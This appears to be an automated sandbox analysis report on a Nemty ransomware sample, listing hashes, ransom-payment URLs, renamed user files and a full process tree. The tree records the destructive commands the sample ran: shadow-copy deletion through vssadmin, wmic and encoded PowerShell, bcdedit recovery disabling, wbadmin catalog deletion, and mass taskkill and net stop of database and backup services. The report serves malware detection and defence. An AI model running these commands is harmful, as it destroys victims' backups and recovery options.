Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
01-02-2022 07:18
Static task
static1
Behavioral task
behavioral1
Sample
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
Resource
win10v2004-en-20220113
General
-
Target
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe
-
Size
87KB
-
MD5
c96613c857018555f3a5bc227567e6e7
-
SHA1
a402f5e46c8e056c9e9494f7e83902e0fcae3a61
-
SHA256
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3
-
SHA512
086fa536e03882efe6eb79a6f56d954205e00c37885f5d23f8eae47702125d7fed2a8c76d6d2e01d6eeb175f273185844a6494847bef2f0f805560867f075c41
Malware Config
Extracted
C:\NEMTY_YX2KTOA-DECRYPT.txt
nemty
http://nemty.top/public/pay.php
http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php
Signatures
-
Nemty
Ransomware discovered in late 2019 which has been actively developed/updated over time.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exedescription ioc process File renamed C:\Users\Admin\Pictures\CompressRepair.raw => C:\Users\Admin\Pictures\CompressRepair.raw.NEMTY_YX2KTOA 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe File opened for modification C:\Users\Admin\Pictures\InvokeSelect.tiff 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe File renamed C:\Users\Admin\Pictures\InvokeSelect.tiff => C:\Users\Admin\Pictures\InvokeSelect.tiff.NEMTY_YX2KTOA 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe File renamed C:\Users\Admin\Pictures\RestorePublish.png => C:\Users\Admin\Pictures\RestorePublish.png.NEMTY_YX2KTOA 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe File renamed C:\Users\Admin\Pictures\UnlockEnter.tif => C:\Users\Admin\Pictures\UnlockEnter.tif.NEMTY_YX2KTOA 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe File renamed C:\Users\Admin\Pictures\UnpublishEnter.png => C:\Users\Admin\Pictures\UnpublishEnter.png.NEMTY_YX2KTOA 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe File renamed C:\Users\Admin\Pictures\BlockDisable.tif => C:\Users\Admin\Pictures\BlockDisable.tif.NEMTY_YX2KTOA 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe File renamed C:\Users\Admin\Pictures\BlockUnpublish.raw => C:\Users\Admin\Pictures\BlockUnpublish.raw.NEMTY_YX2KTOA 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 api.ipify.org 6 api.db-ip.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 560 vssadmin.exe 1132 vssadmin.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1616 taskkill.exe 584 taskkill.exe 1072 taskkill.exe 1296 taskkill.exe 976 taskkill.exe 1524 taskkill.exe 924 taskkill.exe 1844 taskkill.exe 1760 taskkill.exe 532 taskkill.exe 2008 taskkill.exe 1868 taskkill.exe 2000 taskkill.exe 1708 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exepowershell.exepid process 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe 1764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes:
vssvc.exeWMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid process Token: SeBackupPrivilege 1400 vssvc.exe Token: SeRestorePrivilege 1400 vssvc.exe Token: SeAuditPrivilege 1400 vssvc.exe Token: SeIncreaseQuotaPrivilege 1716 WMIC.exe Token: SeSecurityPrivilege 1716 WMIC.exe Token: SeTakeOwnershipPrivilege 1716 WMIC.exe Token: SeLoadDriverPrivilege 1716 WMIC.exe Token: SeSystemProfilePrivilege 1716 WMIC.exe Token: SeSystemtimePrivilege 1716 WMIC.exe Token: SeProfSingleProcessPrivilege 1716 WMIC.exe Token: SeIncBasePriorityPrivilege 1716 WMIC.exe Token: SeCreatePagefilePrivilege 1716 WMIC.exe Token: SeBackupPrivilege 1716 WMIC.exe Token: SeRestorePrivilege 1716 WMIC.exe Token: SeShutdownPrivilege 1716 WMIC.exe Token: SeDebugPrivilege 1716 WMIC.exe Token: SeSystemEnvironmentPrivilege 1716 WMIC.exe Token: SeRemoteShutdownPrivilege 1716 WMIC.exe Token: SeUndockPrivilege 1716 WMIC.exe Token: SeManageVolumePrivilege 1716 WMIC.exe Token: 33 1716 WMIC.exe Token: 34 1716 WMIC.exe Token: 35 1716 WMIC.exe Token: SeDebugPrivilege 1760 taskkill.exe Token: SeIncreaseQuotaPrivilege 1716 WMIC.exe Token: SeSecurityPrivilege 1716 WMIC.exe Token: SeTakeOwnershipPrivilege 1716 WMIC.exe Token: SeLoadDriverPrivilege 1716 WMIC.exe Token: SeSystemProfilePrivilege 1716 WMIC.exe Token: SeSystemtimePrivilege 1716 WMIC.exe Token: SeProfSingleProcessPrivilege 1716 WMIC.exe Token: SeIncBasePriorityPrivilege 1716 WMIC.exe Token: SeCreatePagefilePrivilege 1716 WMIC.exe Token: SeBackupPrivilege 1716 WMIC.exe Token: SeRestorePrivilege 1716 WMIC.exe Token: SeShutdownPrivilege 1716 WMIC.exe Token: SeDebugPrivilege 1716 WMIC.exe Token: SeSystemEnvironmentPrivilege 1716 WMIC.exe Token: SeRemoteShutdownPrivilege 1716 WMIC.exe Token: SeUndockPrivilege 1716 WMIC.exe Token: SeManageVolumePrivilege 1716 WMIC.exe Token: 33 1716 WMIC.exe Token: 34 1716 WMIC.exe Token: 35 1716 WMIC.exe Token: SeDebugPrivilege 532 taskkill.exe Token: SeDebugPrivilege 2008 taskkill.exe Token: SeDebugPrivilege 1616 taskkill.exe Token: SeDebugPrivilege 1868 taskkill.exe Token: SeDebugPrivilege 584 taskkill.exe Token: SeDebugPrivilege 1524 taskkill.exe Token: SeDebugPrivilege 2000 taskkill.exe Token: SeDebugPrivilege 924 taskkill.exe Token: SeDebugPrivilege 1072 taskkill.exe Token: SeDebugPrivilege 1708 taskkill.exe Token: SeDebugPrivilege 1296 taskkill.exe Token: SeDebugPrivilege 976 taskkill.exe Token: SeDebugPrivilege 1844 taskkill.exe Token: SeDebugPrivilege 1764 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.execmd.execmd.execmd.execmd.execmd.exenet.exenet.exenet.exedescription pid process target process PID 1388 wrote to memory of 1668 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 1668 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 1668 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 1668 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 584 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 584 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 584 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 584 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 584 wrote to memory of 560 584 cmd.exe vssadmin.exe PID 584 wrote to memory of 560 584 cmd.exe vssadmin.exe PID 584 wrote to memory of 560 584 cmd.exe vssadmin.exe PID 584 wrote to memory of 560 584 cmd.exe vssadmin.exe PID 1668 wrote to memory of 1132 1668 cmd.exe vssadmin.exe PID 1668 wrote to memory of 1132 1668 cmd.exe vssadmin.exe PID 1668 wrote to memory of 1132 1668 cmd.exe vssadmin.exe PID 1668 wrote to memory of 1132 1668 cmd.exe vssadmin.exe PID 1388 wrote to memory of 1312 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 1312 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 1312 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 1312 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 1552 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 1552 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 1552 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 1552 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 980 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 980 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 980 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1388 wrote to memory of 980 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe cmd.exe PID 1552 wrote to memory of 1708 1552 cmd.exe net.exe PID 1552 wrote to memory of 1708 1552 cmd.exe net.exe PID 1552 wrote to memory of 1708 1552 cmd.exe net.exe PID 1552 wrote to memory of 1708 1552 cmd.exe net.exe PID 1312 wrote to memory of 1760 1312 cmd.exe taskkill.exe PID 1312 wrote to memory of 1760 1312 cmd.exe taskkill.exe PID 1312 wrote to memory of 1760 1312 cmd.exe taskkill.exe PID 1312 wrote to memory of 1760 1312 cmd.exe taskkill.exe PID 1388 wrote to memory of 1764 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe powershell.exe PID 1388 wrote to memory of 1764 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe powershell.exe PID 1388 wrote to memory of 1764 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe powershell.exe PID 1388 wrote to memory of 1764 1388 4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe powershell.exe PID 980 wrote to memory of 1716 980 cmd.exe WMIC.exe PID 980 wrote to memory of 1716 980 cmd.exe WMIC.exe PID 980 wrote to memory of 1716 980 cmd.exe WMIC.exe PID 980 wrote to memory of 1716 980 cmd.exe WMIC.exe PID 1708 wrote to memory of 2008 1708 net.exe net1.exe PID 1708 wrote to memory of 2008 1708 net.exe net1.exe PID 1708 wrote to memory of 2008 1708 net.exe net1.exe PID 1708 wrote to memory of 2008 1708 net.exe net1.exe PID 1552 wrote to memory of 704 1552 cmd.exe net.exe PID 1552 wrote to memory of 704 1552 cmd.exe net.exe PID 1552 wrote to memory of 704 1552 cmd.exe net.exe PID 1552 wrote to memory of 704 1552 cmd.exe net.exe PID 704 wrote to memory of 1020 704 net.exe net1.exe PID 704 wrote to memory of 1020 704 net.exe net1.exe PID 704 wrote to memory of 1020 704 net.exe net1.exe PID 704 wrote to memory of 1020 704 net.exe net1.exe PID 1552 wrote to memory of 604 1552 cmd.exe net.exe PID 1552 wrote to memory of 604 1552 cmd.exe net.exe PID 1552 wrote to memory of 604 1552 cmd.exe net.exe PID 1552 wrote to memory of 604 1552 cmd.exe net.exe PID 604 wrote to memory of 1732 604 net.exe net1.exe PID 604 wrote to memory of 1732 604 net.exe net1.exe PID 604 wrote to memory of 1732 604 net.exe net1.exe PID 604 wrote to memory of 1732 604 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe"C:\Users\Admin\AppData\Local\Temp\4003130247f2cab8b87f3d8de23293ddbc9568dbac75ad594abc7e01a04390d3.exe"1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent4⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.44⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop MongoDB3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup114⤵
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService114⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_YX2KTOA-DECRYPT.txt"2⤵
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_YX2KTOA-DECRYPT.txt3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\NEMTY_YX2KTOA-DECRYPT.txtMD5
b53382d266be823202fe3b7a7edc1d3b
SHA17017a065a772711d21c0bbb4b1c5c8f464768e53
SHA256ff5dd9106b57ead90860c15083585c5925cb16865c5038d60dd5a9d89e1ba384
SHA5127a1599daf22ba8638e854c1029bf3ed45978424764ff1ee87fb48e1aeb6ec5f55b5dcb6ba9fddeae3b4425543f01a27de9b4ac3e36d6125fff66182ba790be2a
-
memory/1388-55-0x00000000758A1000-0x00000000758A3000-memory.dmpFilesize
8KB
-
memory/1764-57-0x0000000002370000-0x0000000002FBA000-memory.dmpFilesize
12.3MB
-
memory/1764-58-0x0000000002370000-0x0000000002FBA000-memory.dmpFilesize
12.3MB